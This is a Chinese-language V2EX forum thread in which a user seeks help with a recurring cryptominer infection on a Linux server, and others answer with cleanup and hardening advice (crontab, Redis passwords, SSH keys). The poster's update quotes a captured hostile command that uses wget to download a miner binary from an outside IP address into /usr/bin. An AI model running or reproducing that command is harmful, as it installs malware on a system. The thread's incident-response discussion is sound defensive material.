V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
ying5201314
V2EX  ›  Linux

求助 服务器被挖矿!

  •  
  •   ying5201314 · 2020-04-11 13:45:41 +08:00 · 6065 次点击
    这是一个创建于 1672 天前的主题,其中的信息可能已经有所发展或是发生改变。
    占用 cpu100% 杀死进程 , 删除异常文件,1 小时后自动创建异常文件,啊啊啊啊啊,降维打击!!! 求大佬
    第 1 条附言  ·  2020-04-18 11:08:29 +08:00
    解决问题过程
    top 查询进程 ps -ef | grep 进程号 可以定位到进程所在路径
    删除之后 还是会自动回复

    没有查到任何的定时任务

    通过 ps -ef 关闭可疑进程

    监听到可疑命令

    wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee
    23 条回复    2020-04-18 17:15:13 +08:00
    yulihao
        1
    yulihao  
       2020-04-11 13:49:56 +08:00
    重装 100%解决问题
    还有记得用证书登陆 SSH 或者 fail2ban
    sholmesian
        2
    sholmesian  
       2020-04-11 13:50:12 +08:00 via iPhone
    备份数据,重做系统。
    crll
        3
    crll  
       2020-04-11 13:51:23 +08:00 via iPhone
    重做系统吧 然后更换 ssh 端口 证书登录 修改密码或者停用 root
    goofool
        4
    goofool  
       2020-04-11 13:56:46 +08:00 via Android
    crontab -l
    sunziren
        5
    sunziren  
       2020-04-11 14:01:19 +08:00
    会不会有个定时任务,自动复活挖矿病毒?
    shellic
        6
    shellic  
       2020-04-11 14:55:58 +08:00 via Android
    当年下班前在阿里云的服务器上装了个 redis,没来得及配置结果吃了个饭的功夫就被黑了
    ying5201314
        7
    ying5201314  
    OP
       2020-04-11 14:57:22 +08:00
    阿里云的 redis 端口没做防护,被美国网址扫描到了,然后就被挖矿了,,,
    buzailianxi
        8
    buzailianxi  
       2020-04-11 14:58:25 +08:00 via Android
    查看你的定时任务删掉,然后很多二进制文件被替换可能
    poisedflw
        9
    poisedflw  
       2020-04-11 15:02:59 +08:00
    @ying5201314 第一步要把他往.ssh/authorized_keys 中写的内容干掉,如果 root 删不掉,记得用 chattr 改下属性。
    关掉 redis
    修改 hosts 把挖矿地址指到 127.0.0.1
    接着删掉 crontab 中的内容
    清理 tmp 下的挖矿脚本
    redis 加密码,做好安全组防护
    秘钥登录
    simonlu9
        10
    simonlu9  
       2020-04-11 15:24:43 +08:00
    镜像还原
    nnnToTnnn
        11
    nnnToTnnn  
       2020-04-11 15:27:25 +08:00
    我很好奇,它是怎么做到 1 小时后自动创建异常文件的。

    我所知道的。 通过

    1. @goofool 的 crontab -l,
    2. 如果是 debian 的服务器,注册 启动的 service 在下次启动的时候创建异常文件
    3. 还有就是通过 /etc/rc.local 来创建文件?
    4. 进程存在恶意程序,定时创建异常文件?
    5. 通过 ssh 的证书登入,scp 来进行创建文件?

    这是什么病毒,能很好的做定时任务的重启,我表示很想学习以下
    learningman
        12
    learningman  
       2020-04-11 16:09:31 +08:00
    @nnnToTnnn 还有替换系统自带的命令的
    defunct9
        13
    defunct9  
       2020-04-11 16:50:43 +08:00 via iPhone
    开 ssh,让我上去看看
    qwerthhusn
        14
    qwerthhusn  
       2020-04-11 18:30:51 +08:00
    它会改你的二进制文件,甚至 cd,ls 都是动过手脚的,最简单的就是重装,加强安全防护
    PHPer233
        15
    PHPer233  
       2020-04-11 18:41:03 +08:00 via Android
    1. 你的服务器可能存在某个漏洞,导致黑客能够随时入侵并植入恶意软件。2. 黑客给你的服务器设置了某种后门,即使 kill 进程后也会自动下载运行挖矿软件。
    zxfgds
        16
    zxfgds  
       2020-04-11 19:36:53 +08:00
    oh , 估计百分之八十可能 redis 未设置密码, 然后 端口开放到公网了吧?
    zxfgds
        17
    zxfgds  
       2020-04-11 19:38:49 +08:00
    CTRL+回车 怎么就发送了呢.

    检查所有用户的 crontab 删除之 , 然后删除异常文件 , redis 设置密码, 不对公网开放 . 修改 ssh 默认端口. 重启 ,解决问题.
    wmhx
        18
    wmhx  
       2020-04-11 20:51:01 +08:00
    如果是 root 进程的,那么重装吧,没有更好办法啦.

    如果是普通用户就全部干掉.
    bzw875
        19
    bzw875  
       2020-04-11 21:02:14 +08:00
    唉,我买的 2 个外网 vps 都被黑了,厂商直接关掉我 vps
    iamwin
        20
    iamwin  
       2020-04-12 11:31:27 +08:00
    别用一键脚本,自己重装系统
    andj4cn
        21
    andj4cn  
       2020-04-12 20:53:39 +08:00
    echo 0 > 挖矿脚本

    这样一般可以暂时解决问题
    shanghj
        22
    shanghj  
       2020-04-18 09:23:52 +08:00   ❤️ 1
    可能楼主已经解决了,我写一下我的解决方案吧。
    1 )先用 top 或 htop 命令查看异常进程的 PID 、用户( USER )、执行文件( FILE )。
    2 ) kill -9 PID (强制停止异常进程),sudo rm -rf FILE (删除异常进程的执行文件)
    3 ) crontab -l (查看定时任务,解决自动恢复,不过一般定时任务没问题, 编辑定时任务用 crontab -e)
    4 ) su root ; passwd -l USER (切换 root,并锁定异常账户登录,恢复登录用 pass -u USER)
    下面的是重点,用来处理复现问题。
    5 ) cd /var/spool/cron/ && ll (进入定时任务目录,查看上面 USER 的定时任务,如果确定不是自己创建的,用 rm -rf 命令删除,并排查一下其他用户的定时任务(尤其是 root ))
    6 ) cd /etc/cron.d/ && ll (用 cat 查看这里的定时任务文件或脚本,找到自动恢复病毒的文件,直接 rm 删除)

    这里说一下,1:尽量不要用一键脚本,或者用前先读一遍,防止中招(感觉要是会,谁还用一键脚本?所以,建议不用) 2:对于宝塔一键面板,谨慎使用,尤其是第三方个人开发的免费插件(我在第三方插件中发现过挖矿脚本) 3:不必要的端口尽量不要开,避免被扫到。很多时候我们的服务器不做处理,在一些人眼里简直就像裸奔一样。
    ying5201314
        23
    ying5201314  
    OP
       2020-04-18 17:15:13 +08:00
    @poisedflw 感谢老哥,时间过了,不能投币了
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2813 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 13:26 · PVG 21:26 · LAX 05:26 · JFK 08:26
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.